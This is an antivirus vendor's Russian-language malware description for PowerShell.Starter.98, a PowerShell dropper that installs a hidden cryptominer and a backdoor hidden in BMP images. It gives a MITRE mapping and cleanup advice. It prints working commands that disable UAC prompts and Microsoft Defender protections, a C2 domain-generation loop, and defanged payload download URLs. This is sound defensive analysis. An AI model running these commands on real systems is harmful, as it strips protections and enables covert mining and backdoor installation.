Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

PowerShell.Starter.98

Добавлен в вирусную базу Dr.Web: 2024-11-27

Описание добавлено:

sha1:

  • 1d46a948eabbaa85fede43fd50a49ad820e96833

Описание

Вредоносный PowerShell-скрипт, выполняющий установку ПО для скрытой добычи криптовалюты. Особенностью является доставка ВПО, стеганографически встроенного в изображения формата BMP.

Принцип действия

  1. Отключает запрос на повышение прав для администраторов в режиме одобрения администратором:

    
        Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;
                    
  2. Добавляет $env:SYSTEMDRIVE\ в исключения антивируса Microsoft Defender.

  3. В $env:PUBLIC\Documents\project.log пишет строку "Back".

  4. Отключает вывод оповещений в Центре уведомлений Windows:

    
        New-Item -Path "HKCU:\Software\Policies\Microsoft\Windows" -Name "Explorer" -force;
        New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" -PropertyType "DWord" -Value 1;
        New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -PropertyType "DWord" -Value 0;
            
  5. Выставляет следующие настройки антивируса Microsoft Defender:

    
        Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;
        Add-MpPreference -ExclusionProcess powershell.exe;
        Add-MpPreference -ExclusionProcess cmd.exe;
            
  6. Возвращает настройки UAC:

    
        Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 5;
            
  7. Добавляет задание с именем 'User' в планировщик заданий по пути \Microsoft\Windows\WindowsBackup\. В этом задании содержится скрипт, который выполняет следующие функции:

    • извлекает запись DNS TXT у следующих доменов:

      
          validssl.net
          validip.net
          validssl.online
          validip.online
          txtkey.online
                      
    • также имеется возможность перебора адресов С2-сервера по следующему DGA-алгоритму:

      
          $ab = "abcdefghijklmn0123456789"
          $dm = @()
          for ($j = 0; $j -lt 5; $j++) {
              $seed = Get-Random
              $d = ""
              for ($i = 0; $i -lt 44; $i++) {
                  $index = [Math]::Floor((Get-Random -Minimum 0 -Maximum ($ab.Length)))
                  $d += $ab[$index]
              }
              $d += ".net"
              $dm += $d
          }
          $dm = $dm | Get-Random -Count $dm.Count
                      

Значение записи DNS TXT меняется. В различное время там содержались следующие адреса полезной нагрузки:

Полезная нагрузка была выполнена в виде очередного PowerShell-скрипта, который запускается командой icm.

Данный скрипт выполняет следующие действия:

  1. с помощью System.Net.WebClient скачивает файл с hxxps://ia601208.us.archive[.]org/31/items/images_20231226_0815/Images.zip и сохраняет его с именем $env:PUBLIC\Pictures\Images.zip.

    В случае недоступности домена, архив скачивается с hххps://getcert[.]net/Images.zip с использованием BitsTransfer,

  2. распаковывает этот архив в $env:PUBLIC\Pictures,

  3. проверяет наличие файлов

    
        $env:PUBLIC\Pictures\Images.zip
        $env:PUBLIC\Pictures\IV.Bmp
        $env:PUBLIC\Pictures\Net.Bmp
            
  4. В зависимости от их наличия скачивает и запускает файлы hххps:\ipv4object[.]net\Cleaner.txt, hххps:\ipv4object[.]net\m.txt и hххps:\ipv4object[.]net\Net.txt соответственно.

PowerShell-скрипт Cleaner.txt (89f0087e0db13a722ae81338cf2228f3514a01c53b954379e88deb0bc93afb6c) выполняет следующие действия:

  1. отключает Windows Script Host, телеметрию и Windows Error Reporting. Также пытается отключить все возможные способы автозагрузки,

    #drweb

  2. отключает сервисы, содержащие в названии последовательность *powershell*, *cscript* и *wscript*,

  3. отключает задания в Планировщике Windows, содержащие в своем названии последовательность Microsoft_* и расположенные по следующим путям:

    
        \Microsoft\Windows\
        \
        \Microsoft\Windows\WindowsUpdate\
            
  4. принудительно завершает процессы:

    xmrig, wscript, cscript, RegAsm, aspnet_compiler, MSBuild, vbc, jsc, AppLaunch, InstallUtil, certlm, nbminer, NVDisplay.Container, RegSvcs,
  5. удаляет файлы с расширениями

    exe, js, vbs, cmd, bat, lnk, ps1, psm1, url, pol, scr, pif, vba, vbe, ps, src, jpg, jpeg, png, txt, xml, som

    в следующих директориях:

    $env:USERPROFILE\,$env:TEMP\, $env:APPDATA\, $env:ProgramData\, $env:ProgramData\Microsoft\Data\, $env:PUBLIC\, $env:PUBLIC\Pictures\, $env:PUBLIC\Libraries\, $env:PUBLIC\Music\, $env:PUBLIC\Videos\, $env:PUBLIC\Downloads\, $env:PUBLIC\Documents\, $env:SYSTEMDRIVE\Users\, $env:SYSTEMDRIVE\Users\Default\Links\, $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\, $env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\, $env:LOCALAPPDATA\, $env:USERPROFILE\AppData\LocalLow\, $env:APPDATA\Microsoft\, $env:TEMP\ebb444342c\, $env:TEMP\RarSFX0\, $env:TEMP\RarSFX1\, $env:LOCALAPPDATA\Microsoft\Internet Explorer\, $env:APPDATA\Microsoft\Windows\SendTo\Bluetooth\, $env:APPDATA\Microsoft\Windows\Themes\CachedFiles\, $env:LOCALAPPDATA\Microsoft\Edge\, $env:LOCALAPPDATA\Microsoft\Ondrive\, $env:LOCALAPPDATA\Programs\Common\,

  6. в файле hosts задает переадресацию на 0.0.0.0 для следующих доменов и адресов:

    uplooder.net, uploadkon.ir, pastebin.com, raw.githubusercontent.com, cdn.discordapp.com, asia1-etc.ethermine.org, eu1-etc.ethermine.org, us1-etc.ethermine.org, pool.supportxmr.com, transfer.sh, filebin.net, flux.2miners.com, ethw.2miners.com, rvn.2miners.com, kas.2miners.com, erg.2miners.com, acc-pool.pw, xmr.2miners.com, files.catbox.moe, xmrpool.eu, appxsvc.linkpc.net, 77.105.147.130, stats404.info, 91.92.251.179, glowies.lol, tuyasmartapp.com, 66.29.132.90.

    Дополнительно блокирует эти же домены и адреса в Брандмауэре Windows,

  7. выполняет команду ipconfig /flushdns.

PowerShell-скрипт m.txt (5650a8a0b88bee5837078ddf0a314752c313be90f05d8de29e6f04097ff92303) выполняет следующие действия:

  1. создает задачу с названием «userdomain» в Планировщике задач Windows по пути \Microsoft\Windows\Windows Error Reporting\, в рамках которой выполняется скрипт, который извлекает полезную нагрузку из изображений m.Bmp и IV.Bmp. В первом изображении содержится инжектор (Trojan.InjectNET.14 3208c2d40e9feeebf2669985d63d79005cf8fce7), а во второй стартер SilentCryptoMiner (Trojan.Siggen23.24088 0f05fbb257fc71ba649175b92fcd963ff23a2540). Внедрение кода выполняется в процесс explorer.exe,

  2. за настройками майнер может обращаться к hххps:\getcert[.]net\m.txt, hххps:\txtc[.]cloud\m.txt, http://validssl[.]online/m.txt.

PowerShell-скрипт Net.txt посредством команды icm запускает скрипт, устанавливающий бэкдор Trojan.PackedNet.2429.

Матрица Mitre

Этап

Тактика

Выполнение

Интерпретаторы командной строки и сценариев (T1059)

PowerShell (T1059.001)

Нативный API (T1106)

Общие модули (T1129)

Повышение привилегий

Внедрение кода в процессы (T1055)

Обход механизмов контроля привилегий (T1548)

Обход контроля учетных записей (T1548.002)

Загрузка сторонних библиотек (T1574.002)

Предотвращение обнаружения

Маскировка (T1036)

Внедрение кода в процессы (T1055)

Изменение реестра (T1112)

Обход контроля учетных записей (T1548.002)

Ослабление защиты (T1562)

Отключение или ослабление средств защиты (T1562.001)

Сокрытие артефактов (T1564)

Скрытые файлы и каталоги (T1564.001)

Скрытое окно (T1564.003)

Обнаружение

Изучение открытых приложений (T1010)

Изучение удаленных систем (T1018)

Изучение процессов (T1057)

Изучение системы (T1082)

Изучение файлов и каталогов (T1083)

Изучение установленного ПО (T1518)

Организация управления

Протокол прикладного уровня (T1071)

Прочие протоколы (T1095)

Зашифрованный канал (T1573)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке